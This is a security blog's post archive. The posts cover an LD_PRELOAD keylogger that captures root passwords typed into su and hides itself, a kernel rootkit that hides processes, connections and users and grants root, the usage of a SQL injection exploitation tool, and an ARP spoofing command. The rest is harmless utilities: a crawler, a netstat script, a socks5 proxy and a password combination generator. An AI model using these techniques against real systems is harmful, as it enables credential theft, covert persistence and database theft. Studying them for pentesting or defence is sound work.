That's all. You can download the header file here, the source file here and the only header dependency, exception.h. The class is licensed under GPLv3, so feel free to use it.

Linux terminal keylogger in userspace

2012-02-09T00:24:00.001-03:00

Introduction

Sometimes, during a pentest, you have access to a certain system user's password, can actually successfully login on the system(using ssh for example), but cannot gain root privileges. This can be caused due to the fact that the user is not a sudoer, nor is sudo installed on the system, and of course, that the password is not the same as the root user.

However, this user might actually use "su" to become the superuser. In this case, we have access to his settings and configuration files, located in his home directory, which can be modified and used to obtain the root's password.

There are several environment variables that libc uses to modify an application's behaviour when launching it. Among many, there is one that allows the user to load one or more arbitrary shared objects right before launching a certain application. This environment variable is named LD_PRELOAD.

The LD_PRELOAD environment variable

Using LD_PRELOAD, a user can launch an application and force it to load any shared object he wants. So how can we take advantage of LD_PRELOAD? On GNU/Linux, programs are usually compiled dynamically, allowing the symbols used in it to be loaded when the application is launched. When the application is executed, the shared objects that contain the symbols used are loaded, and those symbol's addresses are resolved. Every reference to the loaded symbols will use those addresses.

Fortunately for us, this symbol loading is done after the shared objects pointed by LD_PRELOAD are loaded. Therefore, if we compile a shared object which contains a function that has the same signature(name + return type + arguments) as one that another application expects to resolve, it will use ours instead of the "original" one, allowing us to execute arbitrary code.

Okay, so now we can inject arbitrary code, now how can we use this technique? We could hook the read system call, then wait for the user to launch su. Our object would be loaded and we would be able to read the data typed by the user, in which we will eventually find the root's password.

However, we cannot do this, since su is a suid file. The libc does not allow us to execute an application that has the suid bit set, and instruct it to load our library on startup. If this was possible, we could execute ping, for example, make our shared object load and drop a root shell right away. Therefore LD_PRELOAD + suid binary is not a possibility.

Anyhow, we can use another approach. We can hook the execve syscall, which is used by bash to execute commands, and modify its behaviour. This way we could execute whatever we want, no matter what bash is trying to execute.

The actual keylogger

So what i did was to instead of trying to hook the read syscall and log every byte read by the application, was to hook execve and fork() right before calling the original execve and log the data that is written to stdin(which should be read by the execve'd application) into a file. This way, no matter what was being executed, suid files or regular, we can still read stdin, since we are not hooking the syscall on the executed application, but on bash. My execve is basically a proxy that logs everything that is written to stdin before it is sent to the child process.

Finally, we can read every byte written by the user, but we require bash to load our shared object using the LD_PRELOAD environment variable. We can achieve this by editing(or creating) the ~/.pam_environment file and inserting this line into it:

LD_PRELOAD=FullPathToTheSharedObject

In my case, i have inserted the line:

LD_PRELOAD=/home/matias/key.so

After a restart(or logout performed by the user) that environment variable will be set, loading our shared object everytime bash starts.

Note that we can't edit the .bashrc file, since this file is interpreted by bash after the process is created. What we require is a way of editting the LD_PRELOAD environment variable before bash is started, which can be achieved through ~/.pam_environment.

The source code of this PoC is available here https://github.com/mfontanini/Programs-Scripts/tree/master/keylogger. Download both keylogger.c and Makefile. In order to compile, just execute make, keylogger.so will be the object generated.

This is a screenshot of the keylogger, storing the password and commands typed by the user when executing su:

By default the log file is located in /tmp/output. If you want to change it, just edit the sourcecode and edit the OUTPUT_FILE define, or add a CFLAG to the Makefile:

CFLAGS=-c -Wall -O3 -fPIC -DOUTPUT_FILE=/home/somebody/blah.log

There is an array named injected_files which contains a list of all the files that will be "logged" when executed. This is used because there are lots of applications that we don't want to log. This array contains /bin/su and /usr/bin/ssh. Feel free to add any other application that you want to keylog.

Finally, there's a code snippet at the end of the file which removes the value of the LD_PRELOAD variable right after the shared object is loaded. This is just a mechanism to hide our keylogger. Otherwise, if the user executed "echo $LD_PRELOAD" while using bash, he would see the location of our keylogger as the output. Note that by removing the LD_PRELOAD variable, child processes will not load our shared object, therefore in a GUI environment, where the first application that is executed is gnome-terminal or other graphical terminal, and this application is the one that executes bash, the shared object will be loaded by gnome-terminal, but won't be loaded by bash. Therefore, if you plan on using this keylogger on a GUI environment, remove the body of the "void init(void)" function, located at the end of keylogger.c.

Hope you find it useful!

Linux rootkit implementation

2011-12-04T16:49:00.001-03:00

This is a rootkit i developed some time ago for educational purposes. It has the ability to hide itself from lsmod, hide processes, tcp connections, logged in users and to give uid 0 to any running process. The rootkit does not work on linux kernel >= 3.0. now works on Linux Kernels >= 3.0 thanks to Dhiru Kholia, who ported it. He also made the proper fixes for the rootkit to compile on CentOS. The rootkit has been successfully tested on kernels >= 2.6.26.

The hiding is performed through file system function hooking. On Linux, every fs driver provides functions to open, read, write and perform operations with files and directories. This functions are stored in a struct file_operations, stored inside every inode. Therefore, every file_operations contains a pointer to the open, read, write(and many other) functions which will be called whenever a user tries to execute those actions on a filesystem object.

So what i did was to retrieve a certain inode and modify the pointer to its read function, replacing it with my own function. In this new function, filtering on the input was performed, in order to remove the entries i wanted to hide.

Let's take for example the connection hiding mechanism. netstat takes tcp connections information from a virtual file named /proc/net/tcp. This file contains one entry per line, each one indicating source and destination port, source and destination address and more information about each open connection. In order to hide a certain connection, i replaced the default read function with my own, in which i read entries on that file and skipped those containing the port i needed to hide.

In order to give orders to the rootkit, i used the same mechanism. I added a write function pointer to the file /proc/buddyinfo, which by default has no write permissions. So after hooking that function, whenever any user writes something to that virtual file, the rootkit will read what was wrote and execute actions based on the input. The commands it supports are the next ones:

hide/show. This commands hide/show the rootkit from lsmod(actually from /proc/modules).
hsport PORT/ssport PORT. Hides(hsport) connection which have PORT as their source port, or "unhides it"(ssport) if it was previously hidden.
hdport PORT/sdport PORT. Same as above but using destination port instead of source.
hpid PID/spid PID. Hides or "unhides" a process that has PID as its pid. This is done by hooking the /proc readdir pointer.
huser USER/suser USER. This commands hide or "unhide" a logged in user, so that who or other similar commands won't indicate USER is logged in the system. This is done by hooking /var/run/utmp.
root PID. This makes the process identified by PID to contain uid 0 and gid 0. This is kind of dirty but works well; the credentials struct from the init process is copied to the process identified by PID.

This is a screenshot showing how the rootkit works, hiding a user, a process, the ssh socket and making the bash process gain root privileges:

You can get the source code https://github.com/mfontanini/Programs-Scripts/tree/master/rootkit. In order to compile it, you require your kernel's headers(on debian-based distributions, this can be found on the package linux-headers-2.6.X.X, where X depend on your kernel version). Download both the Makefile and the source file, and then just execute:

make
insmod rootkit.ko

That's all. Hope you find it useful!

The Mole - SQL Injection exploitation tool

2011-10-11T17:58:00.001-03:00

The Mole is a command line interface SQL Injection exploitation tool.
This application, developed in python, is able to exploit both union-based and blind boolean-based injections.

Every action The Mole can execute is triggered by a specific command. All this application requires in order to exploit a SQL Injection is the URL(including the parameters) and a needle(a string) that appears in the server's response whenever the injection parameter generates a valid query, and does not appear otherwise. Note that the vulnerable parameter must be the last one on the URL.

So far, The Mole supports Mysql, Mssql and Postgres, but we expect to include other DBMSs.

Edit: to read an updated and more detailed tutorial, please visit: http://themole.nasel.com.ar/?q=tutorial.

Executing The Mole

In order to execute The Mole, you require only python3 and python3-lxml. Once you execute it, a shell prompt will be printed, waiting for commands. You can additionally use some program arguments:

-u URL: Use this to set the URL which contains the vulnerability. This is the same as using the "url" command.

-n NEEDLE: Use this to set the needle to be found in the requested page. This is the same as using the "needle" command.

-t THREADS: Use THREADS threads while performing queries.

Commands

This is a list of all supported commands:

- url [URL]: Gets/sets the URL. This can also be provided as an argument to the application, using the "-u" parameter.

- needle [NEEDLE]: Gets/sets the NEEDLE. This can also be provided as an argument to the application, using the "-n" parameter.

- dbinfo: Fetch current user name, database name and DBMS version.

- schemas: Fetchs the schemas(databases) from the server. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command.

- tables <SCHEMA>: Fetchs the tables for the schema SCHEMA. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command.
e.g: "tables mysql"

- columns <SCHEMA> <TABLE>: Fetchs the columns for the table TABLE, in the schema SCHEMA. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command.
e.g: "columns mysql user"

- query <SCHEMA> <TABLE> COLUMN1[,COLUMN2[,COLUMN3[...]]] [where COND]:
Perform a query to fetch every column given, using the table TABLE located in the schema SCHEMA. A "where condition" can be given. Note that The Mole will take care of any string conversions required on the condition. Therefore, you can use string literals(using single quotes) even if the server escapes them. Note that no caching is performed when executing this command.
e.g: query mysql user User,Password where User = 'root'

- fetch [args]: This command calls schemas, tables or columns commands depending on the arguments given, forcing them to refetch entries, even if they have already been dumped. This is useful when, after having stopped a query in the middle of it, you want to fetch all of the results and not just those that you were able to dump before stopping it.
e.g: "fetch columns mysql user"

- cookie [COOKIE]: Gets/sets a cookie to be sent in each HTTP request's headers.

- mode <union|blind>: Sets the SQL Injection exploitation method. By
default, union mode is used. If the injection cannot be exploited using
this mode, change it to blind using "mode blind" and try again. Nothing else has to be configured to go from union to blind mode, as long as you have already set the URL and needle.

- prefix [PREFIX]: Gets/sets the prefix for each request. The prefix
will be appended to the URL's vulnerable parameter on each request.

- suffix [SUFFIX]: Gets/sets the suffix for each request. The suffix
will be appended after the injection code on the URL's vulnerable parameter.

- verbose <on|off>: Sets the verbose mode on and off. When this mode is on, each request's parameters will be printed out.

- output <pretty|plain>: Sets the output style. When pretty output mode is enabled(this is the default), queries result will be printed on a
tidy box, using column names and each row will be aligned. The drawback is that this method requires the whole query to finish before printing results, so you might want to use "plain" output if you seek immediate results. In contrast, plain mode prints each result as soon as it is recovered.
e.g:
Pretty output might print results like this:

+------------------------------------------------------------------------------------------+
| User | Password |
+------------------------------------------------------------------------------------------+
| blabla | *2B0DDEE3597240B595689260B53D411F515B806D |
| foobar | *641B2485F1789F7A6BEE986648B83A899D96793B |
+------------------------------------------------------------------------------------------+

While plain output will print them like this:

User, Password:
blabla, *2B0DDEE3597240B595689260B53D411F515B806D
foobar, *641B2485F1789F7A6BEE986648B83A899D96793B

- timeout [TIMEOUT]: Gets/Sets the timeout between requests. Use this if the server contains some kind of IDS system that returns HTTP error when executing lots of requests in a short amount of time. Note that TIMEOUT can be a floating point number, so you can set "0.5" as the timeout.

- usage <COMMAND>: Print the usage for the command COMMAND.

- exit: Exit The Mole.

Example

This is a video of The Mole exploiting a SQL Injection, first using union mode, and then using blind mode:

Download

In order to download The Mole, you can visit the project's sourceforge entry: https://sourceforge.net/projects/themole.

Hound: Website crawler

2011-09-27T23:52:00.000-03:00

Hound is a website crawler i developed a couple of months ago. Today i'm releasing the 0.11 version, which includes some bug fixes and new features.

The crawler starts by crawling a given base URL. It then analyses its html code and searches for other URLs which will be collected and will be enqueued for analysis.

The crawler's behaviour is based on plugins. Different kinds of plugins affect it in a different way. One can, for example, activate certain Filter Plugins which will restrict the URLs the crawler will visit, based on each plugin's behaviour. It could be undesirable, under most circumstances, to allow Hound to visit google, facebook, or youtube. This is why a HostFilter can be used, making the crawler only visit URLs that belong to the base host.

There are different types of plugins, each executed on a certain phase of the crawling session. These can be:

Parsers: These are applied to downloaded html in order to normalise it so that the other plugins are able to collect data without worrying about aspects such as which encoding is used, html entities.
Crawl filters: These are applied to every URL found. If a crawl filter matches a certain URL, then the latter is discarded. Host, extension and network filters are examples of them.
Collect filters: These filters are applied to collected URLs, so that they are not taken into account in the crawling results. Again, you might not want to include google links in the results.
Form collect filters: These filters are applied to form tags found in html files.
Header filters: These are applied to a downloaded file's headers. They are usually used when filtering mime-types, for example.
Collectors: The most important plugins. These take care of analysing the html files, parsing href or src attributes, among others, and feeding the crawler with new URLs.

The file hound.conf contains a list of active plugins, including their arguments. Once you've picked the right configuration, you can start a crawling session by executing:

./hound http://website.to.crawl.com

The output will be only be written to stdout. If you want to store it in a file, you can do it by using the -o parameter, followed by its path. This will write the results both to stdout and to the given file. If you don't want to write results to stdout, use the -n parameter.

Once the crawl session has ended, you can use hound to parse the results. Run the following command to list the URLs found:

./hound -i /tmp/hound.out -p urls

Where /tmp/hound.out is the output file used during the crawling session. You can always parse the results manually, since they're stored in text files. To list all the form tags found, execute:

./hound -i /tmp/hound.out -p forms

Which will print something like:

0 POST http://blablabla/search cms_search --- hidden +++ query --- text +++ commit --- image
1 POST http://blablabla/contact/send article_id --- hidden +++ subject --- text +++ sender_name --- text +++ sender_mail --- text +++ reset --- reset

The number on the left of each line identifies each form. This is the way hound uses to encode forms. To generate the html code for a given form id, run:

./hound -i /tmp/hound.out -p form:0

Which will print the html code for the first form.

In order to download hound, you can visit the sourceforge project's site. It is open source, developed using python so you can have a look at the code and create new plugins to serve your needs.

Netstat shellscript

2011-09-08T00:00:00.000-03:00

This is a shellscript i coded a couple of month ago, after i found my router didn't have this utility, and wanted to check its active connections.

It only displays TCP connections, printing the source and destination IP address and port of each of them. The script requires the sh shell interpreter, making it possible to use it in systems which don't have other interpreters like bash, which provides several features which would make the script simpler.

This is the script:



#!/bin/sh

parse_num()
{
    x=$(echo $1 | sed -n 's/0*//p')
    if [ $(echo $x | wc -c) -eq 1 ]
    then
        x=0
    fi
    echo $x
}


hex_to_ip()
{
    index=7
    output=''
    while [ $index -gt 0 ] 
    do
        end=$(expr $index + 1)
        value=$(printf "%d" "0x$(parse_num $(echo $1 | cut -b $index-$end))")
        output="$output.$value"
        index=$(expr $index - 2)
    done
    echo $(echo $output | cut -b 2-)
}
printf "         Src IP  Src port          Dst IP  Dst port\n"

cat /proc/net/tcp | while read line; do
    srcip=$(hex_to_ip $(echo $line | sed -n 's/^[0-9]*: //p' | sed 's/:.*//p'))
    srcport=$(printf "%d" 0x$(parse_num $(echo $line | sed  -n 's/^ *[0-9]*: [0-9,A-F]*://p' | cut "-d " -f 1)))
    dstip=$(hex_to_ip $(echo $line | sed -n 's/^[0-9]*: [0-9,A-F]*:[0-9,A-F]* //p' | sed -n 's/:.*//p'))
    dstport=$(printf "%d" 0x$(parse_num $(echo $line | sed -n 's/^ *[0-9]*: [0-9,A-F]*:[0-9,A-F]* [0-9,A-F]*://p' | cut "-d " -f1)))
    
    printf "%15s %9s %15s %9s\n" $srcip $srcport $dstip $dstport
done

An output example:

Simple socks5 server in C++

2011-09-05T18:50:00.001-03:00

This is a socks5 proxy server i implemented a few months ago. It's developed in C++, and as far as i have tested, works pretty well. There are a couple of things left to do, like handling domain name connection requests, or do a better thread handling, but it has served its purpose so far.

In order to compile it, you can use the GNU C++ compiler, and linking the application with libpthread:

g++ -o socks5 socks5.cpp -lpthread

By default it only accepts authenticated connections, using the USERNAME define as username, and the PASSWORD define as password. If you want to allow unauthenticated connection requests, add a -DALLOW_NO_AUTH flag when compiling.

The proxy server listens on port 5555, you might as well want to change the SERVER_PORT define if you want it to wait for connections on another port.

The source code can be downloaded from github: https://github.com/mfontanini/Programs-Scripts/blob/master/socks5/socks5.cpp.

Hope you find it useful!

ARP spoofing using libtins

2011-09-03T12:39:00.001-03:00

This is an example program I created to test libtins, a library I've been developing with some colleagues. This library allows the user to forge packets, from link layer to transport or even application layer, in C++ by creating their own PDU stack and sending them without worrying about raw sockets, endianness, nor low level socket handling.

To use this program, compile it and link it with libtins. Using GNU C++ compiler, this could be done this way:

g++ -o arpspoofing arpspoofing.cpp -ltins

And then execute it using the gateway and victim's IP addresses as arguments, for example:

./arpspoofing 192.168.0.1 192.168.0.100

This code snippet is included as an example in libtins source code, inside the examples folder. You can have a look at it online here.

Password combination generator

2011-09-02T16:20:00.001-03:00

After several months without mounting an encrypted filesystem, i found out i had forgotten its passphrase. However, i remembered the words i had used, but not the case sensitivity of each character nor the characters i'd replaced for numbers or symbols('o' for '0', 's' for '5', etc). Moreover, i didn't remember which symbol i'd used to separate these words(i could have used '_', '!', '#', etc..).

So after spending half an hour trying out every combination of upper and lower case characters, digits and symbols, i came out with a script to do this automatically.

This script expects several words in lower case as arguments, printing them in the same order, but modifying their case, and transforming characters to numbers or symbols, using a conversion map. There's also a '-e' parameter which allows the user to directly execute a certain command for each combination. The command to execute must contain the string "{0}", which will indicate where each combination will be replaced.

For example, in my quest to mount my encrypted file, i used:

./dictionary.py -e "truecrypt -p {0} --non-interactive encrypted.file" one two three

Where "one two three" are the words which will be used the perform character combinations.

This is the script:

#!/usr/bin/python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#       
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#       
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.


import sys, os


class Word:
    # Dictionary used for conversions between characters, other than
    # simple lower-to-upper conversions. Add here as many as you want,
    # as long as you don't create a cycle ;).
    leet_map = {'A' : '4',
                'E' : '3',
                'I' : '1',
                'O' : '0',
                '1' : '!',
                'S' : '5',
                '5' : '$'
               }

    # The characters to append after each word. Only one of these will
    # be appended at a time.
    appended_list = [' ', '!', '_']
    
    # Appended characters to avoid if this Word is last in the sequence.
    # By default, no spaces will be appended at the end of the phrase,
    # however, they will be included in the middle of it.
    appended_list_avoid = [' ']
    
    
    def __init__(self, base, is_last = False):
        self.base = list(base)
        self.current = list(base)
        self.current_index = 0
        self.is_last = is_last
        self.appended = ''
        self.done = False

    # Increment a particular character. Add any conversion rules in here.
    def _next_char(self, char):
        if char.isalpha():
            if char.islower():
                return char.upper()
            else:
                if char in Word.leet_map:
                    return Word.leet_map[char]
                return char
        else:
            return char if not char in Word.leet_map else Word.leet_map[char]

    # Increment the word. Should only be called if has_next returns True.
    def next(self):
        this_char = self._next_char(self.current[self.current_index])
        if this_char == self.current[self.current_index]:
            # No more conversions for this char, reset previous ones.
            for i in range(self.current_index + 1):
                self.current[i] = self.base[i]
            self.current_index += 1
            if self.current_index < len(self.base):
                self.next()
                self.current_index = 0
            else:
                # Find the current appended character
                try:
                    index = Word.appended_list.index(self.appended)
                except:
                    index = -1
                if index == len(Word.appended_list) - 1:
                    # Appended char cannot be incremented. We're done.
                    self.done = True
                else:
                    try:
                        if self.is_last:
                            while Word.appended_list[index+1] in Word.appended_list_avoid:
                                index += 1
                        # Increment the appended character.
                        self.appended = Word.appended_list[index+1]
                        self.current_index = 0
                    except:
                        self.done = True
                
        else:
            self.current[self.current_index] = this_char

    # Returns boolean indicating whether this Word can be incremented.
    def has_next(self):
        return not self.done

    # Returns the current string.
    def get_current(self):
        return ''.join(self.current) + self.appended

    # Resets every field in this Word.
    def reset(self):
        self.current = list(self.base)
        self.current_index = 0
        self.appended = ''
        self.done = False
        

class Wordlist:
    def __init__(self, words):
        self.words = []
        for i in words[:-1]:
            self.words.append(Word(i))
        self.words.append(Word(words[-1], True))

    # Increment the words one step.
    def _inc(self, index):
        # No words to increment left
        if index == len(self.words):
            return index
        if self.words[index].has_next():
            self.words[index].next()
            if not self.words[index].has_next():
                # We've got carry. Reset words[0:index], 
                # then increment words[index+1] and propagate.
                for i in range(index+1):
                    self.words[i].reset()
                return self._inc(index+1)
            else:
                return index
        else:
            return index + 1

    def do_action(self, to_exec):
        line = ''.join(map(lambda x: ''.join(x.get_current()), self.words))
        if len(to_exec) == 0:
            print line
        else:
            os.system(to_exec.format('"' + line + '"'))

    def generate(self, to_exec):
        i = 0
        while i < len(self.words):
            self.do_action(to_exec)
            i = self._inc(0)
            


def usage():
    print ' Usage: ' + sys.argv[0] + ' [-e EXEC] <WORD1> [WORD2] [WORD3]\n'
    print ' If -e option is used, then the next parameter is the command to execute'
    print ' for each word combination. The command must contain {0} where each '
    print ' combination will be included. Example: "echo {0}"\n'
    print ' If no command is given, then each permutation will be printed to stdout'
    
    exit(1)

if __name__ == '__main__':
    if len(sys.argv) == 1 or '-h' in sys.argv:
        usage()

    args = sys.argv[1:]
    to_exec = ''

    if args[0] == '-e':
        if len(args) <= 2:
            usage()
        to_exec = args[1]
        args = args[2:]

    words = Wordlist(args)
    words.generate(to_exec)

Hope you find it useful!